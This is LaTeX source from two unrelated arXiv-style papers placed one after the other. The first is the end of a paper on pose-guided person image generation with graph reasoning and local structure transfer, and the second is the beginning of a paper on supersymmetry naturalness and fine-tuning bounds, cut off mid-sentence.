Conditioned on a semantic segmentation map, semantic image generation is a special form of general image generation, whose solution is commonly based on style control. Style is mainly defined as the statistical property of the image feature which can be spatial varying~\cite{park2019semantic}, region adaptive~\cite{zhu2020sean}, or class specific~\cite{tan2021effi,tan2021diverse}. To transfer the style from one to another, they model the style as the modulation scale/shift parameters. Specifically, SPADE~\cite{park2019semantic} predicts spatial-varying affine parameters which modulates reference image features in different locations and obtains more dedicated style injection and high fidelity generation results. Later, SEAN~\cite{zhu2020sean} enforces the per-region style extraction and modulation. Our method stems from this scheme and injects the desired style based on whether it is occluded or not, which achieves more precise semantic manipulation.
\section{Method}
\subsection{Overview}
We propose a novel framework GLocal for person image generation which is divided into three stages: semantic prediction, global graph reasoning, and local structure transfer. As shown in Figure~\ref{fig:framework}, the semantic prediction network can supply semantic layout for per-region style extraction and injection in the global graph reasoning stage. The local structure transfer module further controls the generation process with local structure modeling and transferring.
\subsubsection{Preliminary}
To align the source feature $F_s$ with the target $F_t$ and supply visibility guidance, we adopt the Intr-Flow~\cite{li2019dense} to learn the appearance warping flow $W$ and visibility map $m_{vis}$ by matching the 3D human body model. The visibility map can indicate whether it is visible or not in the target for each source position.
\subsection{Semantic Prediction}
Directly generating a person image solely from target pose map involves the estimation of human semantic and body details, which is troublesome since they are highly related to each other. To simplify the overall generation process, we turn to generate the target semantic map first, which is easier to estimate and can provide better semantic assistance for further texture detail complement.\\
\indent Our semantic prediction network adopts the vanilla pix2pix~\cite{isola2017image} architecture, which takes the source image ${I}_s$, source pose map ${P}_s$, and target pose map ${P}_t$ as inputs. The semantic map consists of 8 semantic classes, among them some classes occupying a large area comprise the majority of the loss, which leads to inefficient learning for small parts (e.g., shoes). Considering this, we propose to utilize the focal loss~\cite{lin2017focal} to alleviate the class imbalance problem. Mathematically, the focal loss in class-balanced semantic prediction is formulated as:
\begin{equation}
\mathcal{L}_{\mathrm{S}_g}=-\left(1-p_{t}\right)^{\eta} \log \left(p_{t}\right), p_{t}=
\left\{
\begin{aligned}
\mathrm{S}_g, & \text { when } \mathrm{S}_t=1 \\
1-\mathrm{S}_g, & \text { when } \mathrm{S}_t=0
\end{aligned}
\right.
\end{equation}
where $\mathrm{S}_t \in\{1,0\} $ specifies the ground-truth target segmentation map and $\mathrm{S}_g \in [0,1]$ denotes the predicted probability for the class with label $\mathrm{S}_t=1$. $\eta$ acts as the tunable focusing parameter and thus the scaling factor $\left(1-p_{t}\right)^{\eta}$ can effectively focus on the hard classes, e.g. shoes or hands.
\begin{figure*}[t]
\centering
\includegraphics[width=0.95\linewidth]{figs/RGN.pdf}
\caption{Architecture of our GGR (Global Graph Reasoning) module.}
\label{fig:rgn}
\end{figure*}
\subsection{Global Graph Reasoning}
\label{sec:ggr}
As exemplified in Figure~\ref{fig:rgn}, to extract the style codes of the source for each region, we perform per-region average pooling on the encoded source features according to the source segmentation map $S_s$ and obtain the source's style code $ST \in R^{N \times 512}$, where $N$ denotes the number of semantic regions. To distinguish the occluded and non-occluded area for each region, we calculate the occlusion map $m_{oc}$ with predicted $S_g$ and visibility map $m_{vis}$ by element-wise product. For \textit{non-occluded} area, we inject each style into corresponding region. Then we perform per-style convolution and broadcast the convolved style codes to target regions. However, for \textit{occluded} area, directly generating with corresponding source region's style information may introduces irrationality. Thus we need to supply more accurate style representation for occluded area estimation with global style reasoning.
\subsubsection{Graph Modeling for Source Styles}
\indent Since some body parts generally share similar appearance characteristics, e.g., the neck and the hand should be highly analogous in color. so it is natural to aid the occlusion estimation with global graph style propagation along with the human body structure. Given the encoded source feature style codes, we construct a relation graph with region-wise style code as graph nodes and natural connectivities in human body structure. Then the style feature nodes can be recurrently updated via graph propagation. Specifically, we construct a spatial graph $G=(V, E)$ on the N regions to feature the inter-region connection, where the node set $V=\left\{v_{i} \mid i=1, \ldots, N \right\}$ represents the all per-region style vectors. These nodes are connected with edges $E=\left\{v_{i} v_{j}\right\}$ according to the connectivity of human body structure. Then we perform spatial graph convolution to propagate the style information. The graph convolved node value at $\mathbf{x}$ can be written as:
\begin{equation}
{ST}_{oc}\left(v_{i}\right)=\sum_{v_{j} \in B\left(v_{i}\right)} \frac{1}{Z_i\left(v_ j\right)} {ST}\left(\mathbf{p}\left(v_i, v_ j\right)\right) \cdot \mathbf{w}\left(v_i, v_j\right)
\end{equation}
where the sampling function $\mathbf{p}: B\left(v_i\right) \rightarrow V$ is defined on the neighbor set $B\left(v_ i\right)= \left\{v_j \mid d\left(v_j, v_i\right) \leq D\right\}$ of node $v_i$ and $D$ is set to 1. The weighting function $\mathbf{w}\left(v_i, v_j\right)$ in graph convolution allocates a specific weighting value to each sampled node according to the subset it belongs, unlike the 2D convolution convolves its pixels according to the fixed square order. As illustrated in Figure~\ref{fig:graph}, we divide the neighbor set $B\left(v_i\right)$ of node $v_i$ into three subsets with centrifugal distance comparison. The mapping from nodes to its subset label is defined as:
\begin{equation}
r_{i}\left(v_j\right)=\left\{\begin{array}{ll}
0 & \text { if } e_{j}=e_{i} \\
1 & \text { if } e_{j}<e_{i} \\
2 & \text { if } e_{j}>e_{i}
\end{array}\right.
\end{equation}
where $e_i$ denotes the average distance from gravity center to node $i$. The convolution product of each subset is normalized by the balance term $Z_i\left(v_j\right)=\mid\left\{v_k \mid r_ i\left(v_k\right)=\right.\left.r_i\left(v_j\right)\right\} \mid$. \\
\indent After reasoning the occlusion area with style code graph, we can advance to the generation of conditioning feature map, whose occluded regions are now filled with globally reasoned source style features. By performing convolution and broadcasting on the conditional feature map, we obtain two sets of spatial-varying modulation parameters $\gamma$ and $\beta$. They act as the scale and bias to modulate the normalized feature map $F_{I}$ to get $F_{o}$.
\begin{equation}
F_{o} = \gamma \times \textbf{BN}(F_{I}) + \beta
\end{equation}
\subsection{Local Structure Transfer}
The GGR module can only capture the global statistics of the source and thus localized structure cannot be effectively preserved from source to target. As shown in Figure~\ref{fig:lsc}, to transfer the local structural context relationship, we first get local correlation map ${F}_{c}$, which models the local structure with self-correlation layer. Then we predict the full convolution kernels $f$ and bias $b$, since these kernels better distill local spatial structure. After aligning these parameters with the target by optimal transport, we perform LocConv to transfer the local structure of the source to the generation activations via convolution on the normalized target features.
\subsubsection{Modeling Local Structure}
Intuitively, the local structure of the feature map can be represented by the adjoining patch correlation patterns (i.e. the relationship of one patch with its neighbors). In light of this, we extract the local structural representation of source features with a self-correlation layer that perform multiplicative patch comparisons around each source position. Formally, given the source feature map ${F}_{s} \in \mathbb{R}^{c \times H \times W}$, our self-correlation layer calculates the correlation of two patches centered at $i$ and its neighbors $j \in \mathcal{N}(i)$ via vector product, which is defined as
\begin{equation}
\setlength{\abovedisplayskip}{5pt}
\setlength{\belowdisplayskip}{5pt}
\begin{aligned}
c({i},j) &= \mkern-18mu \sum_{{p} \in [-r,r] \times [-r,r] } \mkern-36mu\langle{F}_s(i+{p}),{F}_s(j+{p})\rangle\\
{F}_{c}(i) &= \mathop{Concat}\limits_{j \in \mathcal{N}(i) }({c(i,j)}), \vert\vert i - j \vert\vert \leq d
\end{aligned}
\label{eq:patch_correlation}
\end{equation}
where the $Concat$ denotes the channel-wise concatenate. Note that for computational restriction, we just compute self-correlation $c(i,j)$ with neighbors whose distance from $i$ is less than $d$. After correlating the positions around $i$, we concatenate the correlations in channel to get the local structure representation ${F}_{c}\in \mathbb{R}^{(2d+1)^2 \times H \times W}$.
\begin{figure}[t]
\begin{center}
\setlength{\tabcolsep}{0.03cm}
\renewcommand{\arraystretch}{0.5}
\begin{tabular}{c}
{\includegraphics[width=0.8\linewidth]{./figs/graph.pdf}}
\end{tabular}
\end{center}
\caption{The illustration of nodes division strategy in our graph convolution. (a) The red dot represents the node where the convolution will take place and the nodes within the receptive field are surrounded by the a dotted line. (b) The neighbors are divided into three subsets 0, 1 and 2 according to its distance from the gravity center(black node).}
\label{fig:graph}
\end{figure}
\begin{figure}[t]
\begin{center}
\includegraphics[width=0.95\linewidth]{figs/LSC.pdf}
\end{center}
\caption{Architecture of LST (Local Structure Transfer) module.}
\label{fig:lsc}
\end{figure}
To better distill the local structure statistics and assist the structural transferring, we predict the spatial- and channel-varying modulation values including the 3D filter ${f} \in \mathbb{R}^{H \times W \times c \times (k \times k)}$ and bias ${b} \in \mathbb{R}^{H \times W \times c \times 1 }$ from the local structure representation ${F}_{c}$ via point-wise convolutions.
\subsubsection{Modulation Parameters Alignment}
To further align the modulation parameters with the target, we introduce the Unbalanced Optimal Transport (UOT)~\cite{zhan2021unbalanced} mechanism to match the encoded source $F_s$ and generation features $F_{o}$ with calculated transport plan ($TP$). To solve a optimal transport problem which aims to transform one collections of masses to another, we define the masses of source and generated features with dirac form: $\alpha=\sum_{i=1}^{n} \alpha_{i} \delta_{s_{i}}$ and $\beta=\sum_{i=1}^{n} \beta_{i} \delta_{{o}_{i}}$, where the $s_i$ and ${o}_i$ denote the positions of $\alpha_i$ and $\beta_j$ in the $F_s$ and $F_o$, respectively. Then the optimal transport problem can be formulated as:
\begin{equation}
\begin{split}
& OT(\alpha,\beta) = \mathop{\min}\limits_{TP} (\sum_{i,j=1}^{n} {TP}_{ij}C_{ij}) = \mathop{\min}\limits_{TP} \langle C, TP \rangle \\
&{\rm subject \ to} \quad (TP \vec{1}) = \alpha, \quad (TP^\top \vec{1}) = \beta \\
\end{split}
\label{formula_ot}
\end{equation}
where the cost matrix $C$ is formulated as $C_{i j}=1-\frac{s_{i}^{\top} \cdot {oc}_{j}}{\left\|s_{i}\right\|\left\|{oc}_{j}\right\|}$, giving the cost to move mass $\alpha_i$ to $\beta_j$. $TP $ denotes the transport plan of which each element $TP_{i j}$ denotes the quantity of masses transported between $\alpha_i$ to $\beta_j$. With the transport plan, we can warp $f$ and $b$ to get the aligned modulation parameters $\hat{f}$ and $\hat{b}$, which is formulated as:
\begin{equation}
\hat{f} = TP \cdot f, \hat{b} = TP \cdot b, TP \in \mathbb{R}^{HW \times HW}
\end{equation}
\subsubsection{LocConv for Stucture Transfer}
Unlike $1 \times 1$ kernel size adopted in the conventional point-wise modulation (e.g., SPADE~\cite{park2019semantic}), the $k \times k$ square filter of LocConv allows for modulating the generation acitvations with the local structure in the neighborhood around point $l:(i,j)$ of feature map $F_o$. Then we can obtain generation feature map $F_g$ by modulating the aligned modulation filter $\hat{f}$ and bias $\hat{b}$ at $F_{o}$ in a spatial- and channel-varying way. The value of $F_g$ located at $l:(i,j)$ is defined as:
\begin{equation}
\begin{aligned}
F_g(l)&=\text {LocConv}(F_{o},l ; {\hat{f}}, \hat{b}) \\
&= \sum_{{F_{o}}(p) \in \mathcal{N}({F_{o}}(l))} \hat{f}_{p}\left(\frac{{F_{o}}(p)-\mu_{{F_{o}}}}{\sigma_{{F_{o}}}}\right)+\hat{b}_p
\end{aligned}
\end{equation}
where $\mu_{F_{o}}$ and $\sigma_{F_{o}}$ represent the channel-wise mean and standard deviation of the $F_{o}$. Finally we can get the $F_g$ by enumerating positions in $F_{o}$.
\subsection{Learning Objectives}\label{loss}
After the semantic prediction network is trained with our proposed $\mathcal{L}(\mathrm{S}_g)$. The whole networks is then trained end-to-end with source image ${I}_s$, source pose ${P}_s$, and target pose ${P}_t$ as inputs. We encourage the generated target-posed image ${I}_g$ to close in the groundtruth target image ${I}_t$ in image and perceptual level. Thus we introduce following learning objectives to guide the training process.
\noindent\textbf{Pixel-wise Loss.} To generate more sharp images, we use $\mathcal{L}_{L1}$ to measure the pixel-wise fiderlity between the generated image${I}_{g}$ and the groundtruth$I_{t}$ in image pixel space.
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}_{L1} = ||{I}_{g}-I_{t}||_1,
\end{equation}
\noindent\textbf{Perceptual Loss.} Besides the pixel-wise loss, we also adopt the perceptual similarity measurement in VGG-19~\cite{simonyan2014very} feature space with perceptual loss.
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}_{perc}=||\phi_k({I}_{g})-\phi_k(I_{t})||_2^2,
\end{equation}
{where $\phi_k$ represents the neuron response at $k_{th}$ layer extracted with a pretrained VGG-19 model.}\\
\noindent\textbf{Adversarial Loss.}
Due to the great potential of GAN, we introduce the adversarial loss to encourage the generator to generate photo-realistic images in adversarial manner. The training objective for the discriminator $D$ and generator $G$ is caculated with:
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\begin{aligned}
\mathcal{L}_{adv}(G,D)=&\mathbb{E}_{I_{s},I_{t}}[\log(1-D(G(P_t,I_{s},{S}_{t} )|I_{s},P_t))]
\\+&\mathbb{E}_{I_{s},I_{t}}[\log D(I_{t}|I_{s},P_t)].
\end{aligned}
\end{equation}
\noindent\textbf{Overall loss function.} The final learning objective is incorporated with above-mentioned losses, which is defined as:
\begin{equation}
\setlength{\abovedisplayskip}{4pt}
\setlength{\belowdisplayskip}{4pt}
\mathcal{L}=\alpha_{S_g}\mathcal{L}_{S_g}+\alpha_{L1}\mathcal{L}_{L1}+\alpha_{perc}\mathcal{L}_{perc} + \alpha_{adv}\mathcal{L}_{adv},
\end{equation}
where $\alpha_{S_g}$, $\alpha_{L1}$, $\alpha_{perc}$, $\alpha_{adv}$ are the trade-off weights.
\section{Experiments}\label{exp}
In this section, we first introduce implementation details including dataset and image quality evaluation metrics. Then we perform extensive experiments to illustrate the superiority over the prevalent methods and verify the effectiveness of our model.
\subsection{Implementation Details}
We select DeepFashion~\cite{liu2016deepfashion} to evaluate our method for its diversity among human identity and coverage of different clothes. The DeepFashion dataset contains 52712 high resolution images which show various clothing styles and poses. All images are resized to 256x176, which is adopted by many previous methods. Following the strategy of~\cite{ren2020deep}, we obtain image pairs and split them into 101966 for training and 8570 for testing without overlap. To measure generated results from different aspects, we choose Structural Index Similarity (SSIM) and Peak Signal to Noise Ratio (PSNR) for image-level similarity measurement which are sensitive to the image quality of imperceptibility. For perceptual evaluation, Inception Score (IS) and Fréchet Inception Distance (FID) are introduced to calculate the feature-level and distribution-based distance between the InceptionNet-encoded features.
\begin{figure*}[!t]
\centering
\includegraphics[width= 0.9\linewidth]{figs/comparison.pdf}
\caption{{Visual comparison with the competing methods on DeepFashion dataset. Best view it by zooming in the screen.}}
\label{fig:comparison}
\end{figure*}
\subsection{Qualitative Analysis}
Figure~\ref{fig:comparison} presents the qualitative comparisons between several state-of-the-art methods and our model, which demonstrates the superiority of our method in clothes structure recovery, photo-realistic texture rendering, and distinct person identities preservation. The LiquidGAN~\cite{liu2019liquid} will generate weird human images when accurate 3D human modeling is not available. Methods such as PoNA~\cite{li2020pona}, XingGAN~\cite{tang2020xinggan}, and GFLA~\cite{ren2020deep} tend to generate unreasonable texture for lack of semantic guidance. Besides, the PISE~\cite{zhang2021pise} and SPGNet~\cite{lv2021learning} overlook the inter-region correlation and the distinction between occluded or non-occluded regions, resulting in visual artifacts like cluttered textures in the occlusion estimation. Different from all of them, our model adaptively predicts the invisible regions through graph-based region style reasoning. As circled in Figure~\ref{fig:comparison}, our model can maintain better shape consistency and generate more reasonable texture for invisible parts. Notably, benefited from our Local Structure Transfer module that can model and transfer local characteristics, our model can better preserve the hat structure as shown in the last row of Figure~\ref{fig:comparison}.
\begin{table}
\setlength{\tabcolsep}{1.6mm}
\centering
\begin{tabular}{l|cccc}
\hline \multicolumn{1}{c|} { Methods } & FID $\downarrow$ & IS $\uparrow$ & SSIM $\uparrow$ & PSNR $\uparrow$ \\
\hline \hline LiquidGAN & $25.01$ & $\mathbf{3.56}$ & $0.613$ & $28.75$ \\
PoNA & $23.23$ & $3.33$ & $0.774$ & $31.34$ \\
XingGAN & $41.79$ & $3.23$ & $0.762$ & $31.08$ \\
GFLA & $14.52$ & $3.29$ & $0.649$ & $31.28$ \\
PISE & $\underline{13.61}$ & $3.41$ & $0.767$ & $\underline{31.38}$ \\
SPGNet & $14.75$ & $2.99$ & $\underline{0.775}$ & $31.24$ \\
GLocal(Ours) & $\mathbf{11.31}$ & $\underline{3.47}$ & $\mathbf{0.779}$ & $\mathbf{31.42}$ \\
\hline
\hline
w/o FL & $15.88$ & $3.46$ & $\mathbf{0.779}$ & $\mathbf{31.42}$ \\
w/o GGR & $17.39$ & $3.20$ & $0.769$ & $31.13$ \\
w/o LST & $16.93$ & $3.43$ & $\underline{0.775}$ & $31.28$ \\
\hline
\end{tabular}
\caption{Comparison with other state-of-the-art methods and variants on DeepFashion dataset. FID, IS, SSIM and PSNR are aforementioned metrics. $\uparrow$ and $\downarrow$ represent the higher the better and the lower the better. \textbf{Bold} and \underline{underlined} digits mean the best and the second best of each metric.}
\label{tab:comp}
\end{table}
\begin{figure}[!t]
\centering
\includegraphics[width= 1.0\linewidth]{figs/ablation.pdf}
\caption{{The visual comparison of the variants and our full model. Best view enlarged on screen.}}
\label{fig:ablation}
\end{figure}
\subsection{Quantitative Comparison}
We also compare state-of-the-art methods with our model by numerical cevaluation. Among all the models, our result reaches the highest SSIM and PSNR scores, which indicates that our model maintains the low-level statistical consistency with real images best. We further adopt deep metrics including FID and IS scores to measure the high-level perceptual consistency between our generated images and real images. As shown in Table~\ref{tab:comp}, our model leads the best in FID, which clearly shows the advantages to preserve the texture details. Besides, the IS score of our model surpasses most of prevalent models, which means that our GLocal can generate images with better quality and realism.
\subsection{Ablation Study}
We have trained several variant models to examine the effectiveness of our important components.
\noindent\textbf{w/o Focal Loss(w/o FL).} This variant predict the segmentation map with the vanilla multi-class cross-entropy loss.
\noindent\textbf{w/o Global Graph Reasoning(w/o GGR).} This variant removes the graph reasoning block and thus ignoring the distinction between occluded and non-occluded areas.
\noindent\textbf{w/o Local Structure Transfer(w/o LST).} This variant removes the local structure transfer mechanism and simply takes the features processed by global graph reasoning as the decoder input to generate the final image.
\noindent\textbf{GLocal (Ours).}This is the full model of our method.
From the quantitative result shown in Table~\ref{tab:comp}, we can verify the improvement of our three components. Compared with other variants, our full model outperforms them by a large margin in FID, which indicates that the cooperation of these components can generate more photo-realistic images. Besides, our full model also achieves the leading performance with the best IS, SSIM, and PSNR scores, which means that our full model can improve shape consistency, structure similarity, and pixel-level alignment with the real images. Intuitively, from the visual results in Figure~\ref{fig:ablation}, we can see that focal loss helps to achieve more dedicated semantic prediction since the less occupied region cannot be estimated under \textbf{w/o FL} setting (e.g. the segmentation map predicted by w/o FL lacks the sheet region.), which further leads to unrealistic texture rendering. For variants like \textbf{w/o GGR} and \textbf{w/o LST}, it fails to infer the occluded regions and preserve the structure information as depicted by the absurd texture performance, which is circled in Figure~\ref{fig:ablation}.
\begin{figure}[!t]
\centering
\includegraphics[width=1.0\linewidth]{figs/application.pdf}
\caption{Texture inpainting application. We can perform image inpainting for missing regions by global graph reasoning in our GLocal model. The input are corrupted images which is masked with irregular or semantic masks and images in the red-box denote the ground truth images. }
\label{fig:application}
\end{figure}
\section{Application}
Our GLocal model can also be extended to texture inpainting by inferring the invisible region in a corrupted source image. Given source image whose partial region is masked, the texture inpainting task can reconstruct the source image by filling in the missing region. The corrupted region in texture inpainting can be regarded as the occluded region in pose transfer since they both are invisible in the reference image. Based on this observation, we can utilize the region-wise graph reasoning to reconstruct the original image by calculating the style latent codes of the existing area and propagating the contextual style statistics into the missing regions with graph reasoning. The selection of mask shape divides our application into the following two categories.
\noindent\textbf{Irregular region inpainting.} The irregular region inpainting produces the inpainted result based on the irregular masked input, whose corrupted mask is provided by Irregular Mask Dataset\cite{liu2018image}. As shown in Figure~\ref{fig:application} (a), our method can generate correct structure and consistent textures for irregular regions with visible texture.
\noindent\textbf{Semantic region inpainting.} For semantic region inpainting, we randomly remove the texture for specific semantic regions (e.g.hair, pants). From the visual results in Figure~\ref{fig:application} (b), our approach is capable of recovering the content and rendering reasonable semantics.
\section{Conclusion}
In this paper, we have presented a semantic-assisted person image generation framework to synthesis the target-posed source person or inpaint the corrupted image. Our approach models the semantic regions as a human skeleton-based graph and then infers the occluded target region's style with graph reasoning. To transfer the local structure from source to the generation features, the local property is learned with self-correlation and global-varying affine parameters are employed to modulate the generation activations. Extensive experiments and ablation studies have proven the superiority and effectiveness of our model.
| 2024-02-18T23:40:11.355Z | 2021-12-02T02:13:24.000Z | algebraic_stack_train_0000 | 1,580 | 4,927 |
|
proofpile-arXiv_065-7944 | \section{Introduction}
Extensive searches of supersymmetric signals, done mostly but not only at LEP, have found
no positive result so far~\cite{pdg,vancouver}.
Nevertheless these results turn out to have interesting consequences,
because the typical spectrum of existing `conventional' supersymmetric models contains
some sparticle (a chargino, a neutralino or a slepton, depending on the model)
with mass of few $10\,{\rm GeV}$.
How much should one worry about the fact that experimental bounds
require these particles heavier than $(80\div90)\,{\rm GeV}$?
A first attempt to answer this question has been made in~\cite{CEP},
using the fine tuning (`FT') parameter~\cite{FT} as a quantitative measure of naturalness.
After including some important one loop effects~\cite{V1loop,FTLEP}
that alleviate the problem,
in minimal supergravity the most recent bounds require a FT (defined as in~\cite{FTLEP})
greater than about 6~\cite{FTLEP,CEP2},
and a FT greater than about $20$ to reach values of $\tan\beta<2$.
Still it is not clear if having a FT larger than 6 is worryingly unnatural.
Setting an upper bound on the FT is a subjective choice.
The FT can be large in some cases where nothing of unnatural happens
(i.e.\ dimensional transmutation)~\cite{FTcritica}.
Does a $Z$-boson mass with a strong dependence on the supersymmetric parameters
indicate a problem for supersymmetry (SUSY)?
The answer is yes: in this case the FT is related to naturalness, although in an indirect way~\cite{GMFT}.
Rather than discussing this kind of details,
in this paper we approach the naturalness problem in a more direct way.
When performing a generic random scanning of the SUSY parameters,
the density distribution of the final results has no particular meaning.
For this reason the sampling spectra that turn out to be experimentally excluded are usually dropped.
In order to clearly exhibit the naturalness problem, we make plots in which
{\em the sampling density is proportional to the naturalness probability}
(we will discuss its relation with a correctly defined `fine tuning' coefficient),
so that it is more probable to live in regions with higher density of sampling points.
Plotting together the experimentally excluded and the few still allowed points
we show in fig.s~\ref{fig:MassePallini}, \ref{fig:MasseCampane} in
a direct way how strong are the bounds on supersymmetry.
We find that
\begin{itemize}
\item
The minimal FT can be as low as 6, but such a relatively low FT is atypical:
the bounds on the chargino and higgs masses exclude
95\% of the MSSM parameter space with supersymmetry breaking mediated by
`minimal' or `unified' supergravity.
\item
LHC experiments will explore $90\%$ of the small remaining part of the parameter space
(we are assuming that it will be possible to discover coloured superparticles lighter than $2\,{\rm TeV}$).
\item The supersymmetric naturalness problem is more serious in gauge mediation models.
\end{itemize}
Some regions of the parameter space are more problematic:
\begin{itemize}
\item values of $\tan\beta$ lower than 2 (a range
suggested by an infra-red fixed-point analysis and by the $b/\tau$ unification);
\item values of $\tan\beta$ bigger than $20$ can naturally appear only in some particular situation,
but often imply a too large effect in $b\to s\gamma$.
\end{itemize}
Some particular and interesting scenario appears strongly disfavoured
\begin{itemize}
\item Gauge mediation models with low messenger mass $M_{\rm GM}\circa{<}10^7\,{\rm GeV}$;
\end{itemize}
or even too unnatural to be of physical interest
\begin{itemize}
\item Baryogenesis at the electroweak scale allowed by a sufficiently light stop.
\end{itemize}
These results are valid in `conventional' supersymmetric models.
It is maybe possible to avoid these conclusions by inventing appropriate models.
However, if one believes in weak scale supersymmetry and thinks that the naturalness problem
should receive a theoretical justification different from an unlikely numerical accident,
one obtains strong constraints on model building.
If instead supersymmetry has escaped experimental detection because
a numerical accident makes the sparticles heavier than the natural expectation,
we compute the naturalness distribution probability for supersymmetric signals in each given model.
There is a non negligible probability that
an accidental cancellation stronger than the `minimal' one
makes the sparticles heavier than $1\,{\rm TeV}$.
\medskip
In section~\ref{procedure} we outline and motivate the procedure that we adopt.
In section~\ref{masses} we show our results for the masses of supersymmetric particles.
In section~\ref{effects} we discuss the natural range of various interesting
supersymmetric loop effects.
Finally in section~\ref{fine} we give our conclusions and we discuss some implication
of the supersymmetric naturalness problem for model building.
In appendix~A we collect the present direct experimental bounds on supersymmetry in a compact form.
Since our formul\ae{} for supersymmetric effects in $B$-mixing correct previous ones
and include recently computed QCD corrections, we list them in appendix~B.
\section{The procedure}\label{procedure}
In this section we describe the sampling procedure we have used to make plots with density of points
proportional to their naturalness probability.
Within a given supersymmetric model (for example minimal supergravity)
we extract random values for the dimensionless ratios of its various supersymmetry-breaking
parameters.
We leave free the overall supersymmetric mass scale, that we call $m_{\rm SUSY}$.
For each choice of the random parameters we compute $v$ and $\tan\beta$
by minimizing the potential:
$m_{\rm SUSY}$ is thus fixed by imposing that $v$ (or $M_Z)$ gets its experimental value.
We can now compute all the masses and loop effects that we want to study;
and compare them with the experimental bounds.
This `Monte Carlo' procedure computes
how frequently numerical accidents can make the $Z$ boson
sufficiently lighter than the unobserved supersymmetric particles.
As discussed in the next subsection, in this way we obtain a sample of supersymmetric spectra with density
proportional to their naturalness probability.
In subsection~\ref{example} we illustrate these considerations with a simple example.
\subsection{Naturalness and fine tuning}
Our approach is related to previous work in this way:
for any given value of the dimensionless ratios
the naturalness probability given by the procedure outlined before is
inversely proportional to the
`fine tuning-like' parameter $\Delta$ defined in~\cite{GMFT},
that in the limit $\Delta\gg1$ reduces
to the original definition of the fine tuning parameter~\cite{FT}.
In a supersymmetric model the $Z$ boson mass, $M_Z^2(\wp)$, can be computed
as function of the parameters $\wp$ of the model,
by minimizing the potential.
A $Z$ boson much lighter than the supersymmetric particles
is obtained for certain values $\wp$ of the supersymmetric parameters,
but is characteristic of only a
small region $\Delta\wp$ of the parameter space.
Unless there is some reason that says that values in this particular range
are more likely than the other possible values,
there is a small probability --- proportional the size $\Delta\wp$ of the
small allowed range ---
that supersymmetry has escaped experimental detection due to some unfortunate accident.
This naturalness probability is thus inversely proportional to the `fine-tuning-like' parameter
\begin{equation}\label{eq:Delta}
\Delta=\frac{\wp}{\Delta\wp}
\end{equation}
defined in~\cite{GMFT}.
As shown in~\cite{GMFT}, if $\Delta\wp$ is small, we can approximate $M_Z^2(\wp)$ with
a first order Taylor expansion around its experimental value,
finding $\Delta\wp \approx \wp/d[\wp]$
where $d$ coincides with the original definition of fine-tuning~\cite{FT}
\begin{equation}
d=\left|\frac{\wp}{M_Z^2}\frac{\partial M_Z^2}{\partial\wp}\right|.
\end{equation}
This original definition of naturalness in terms of the logarithmic sensitivities of $M_Z$
has been criticized~\cite{FTcritica} as being too restrictive or unadequate at all.
The definition\eq{Delta} avoids all the criticisms~\cite{FTcritica}.
\smallskip
To be more concrete, in the approximation that the $Z$ boson mass
is given by a sum of different supersymmetric contributions,
the previous discussion reduce to saying that there is an unnaturally small probability
$p\approx \Delta^{-1}$ that an accidental cancellations allows
a single `contribution' to
$M_Z^2$ be $\Delta$ time bigger than their sum, $M_Z^2$.
Beyond studying how naturally $M_Z$ is produced by the higgs potential,
we will study the natural expectation for various signals of supersymmetry.
Our procedure automatically weights as more unnatural particular situations
typical only of restricted ranges of the parameter space
that the ordinary `fine tuning' parameter does not recognise as more unnatural
(three examples of interesting more unnatural situations:
a cancellation between too large chargino and higgs contributions to $b\to s\gamma$;
an accidentally light stop;
a resonance that makes the neutralino annihilation cross section atypically large).
In the usual approach one needs to introduce extra fine-tuning coefficients
(that for example measure how strong is the dependence of
$\mathop{\rm BR}(b\to s\gamma)$, of the stop mass, of the neutralino relic density
on the model parameters)
to have a complete view of the situation.
\begin{figure}[t]
\begin{center}
\begin{picture}(9,5.4)
\putps(-0.5,0.2)(-0.5,0.2){example}{fexample.ps}
\put(3.4,0){$\wp=\mu/M_2$}
\end{picture}
\caption[SP]{\em The naturalness problem in a typical supersymmetric model.
We plot the chargino mass in GeV as function of $\mu/M_2$,
that is the only free parameter of the model under consideration.
Values of $\wp$ marked in gray are unphysical,
while \Orange light gray\special{color cmyk 0 0 0 1.}{} regions have too light sparticles.
Only the small white vertical band remain experimentally acceptable.
\label{fig:example}}
\end{center}\end{figure}
\subsection{An example}\label{example}
We now try to illustrate the previous discussions with a simple and characteristic example.
We consider the `most minimal' gauge mediation scenario with very heavy messengers
(one $5\oplus\bar{5}$ multiplet of the unified gauge group SU(5) with mass $M_{\rm GM}=10^{15}\,{\rm GeV}$).
`Most minimal' means that we assume that the unknown mechanism that generates the $\mu$-term
does not give additional contributions to the other parameters of the higgs potential.
Since the $B$ terms vanishes at the messenger scale,
we obtain moderately large values of $\tan\beta\sim20$.
This model is a good example because its spectrum is not very different from
a typical supergravity spectrum,
and it is simple because it has only two free parameters:
the overall scale of gauge mediated soft terms and the $\mu$ term.
The condition of correct electroweak breaking fixes the overall mass scale,
and only one parameter remains free.
We choose it to be $\wp\equiv \mu/M_2$ (renormalized at low energy),
where $M_2$ is the mass term of the $\SU(2)_L$ gaugino.
In this model we can assume that $\mu$ and $M_2$ are real and positive without loss of generality.
In figure~\ref{example} we plot, as a function of $\wp$,
the lightest chargino mass in GeV\footnote{\special{color cmyk 0 0 0 1.}
We must mention one uninteresting technical detail since
figure~\ref{fig:example} could be misleading about it.
We are studying how frequently numerical accidents can make the $Z$ boson lighter than the sparticles.
We are {\em not\/} studying how frequently numerical accidents can make the sparticles heavier than the $Z$ bosons.
When including loop effects the two questions are not equivalent.
The first option, discussed in this paper because of physical interest,
gives sparticles naturally heavier than the second option.}.
The gray regions are excluded
because the electroweak gauge symmetry cannot be properly broken
if $\mu/M_2$ is too small or too large.
Values of $\wp$ shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{}
are excluded because some supersymmetric particle is too light
(in this example the chargino gives the strongest bound).
The chargino is heavier than its LEP2 bound
only in a small range of the parameter space at $\wp\approx 2.3$ (left unshaded in fig.~\ref{fig:example})
close to the region where EW symmetry breaking is not possible
because $\mu$ is too large.
{\em The fact that the allowed regions are very small and atypical
is a naturalness problem for supersymmetry}.
Roughly $95\%$ of the possible values of $\wp$ are excluded
by the chargino mass bound.
In this example we have fixed $M_t^{\rm pole}=175\,{\rm GeV}$, and we have taken into account
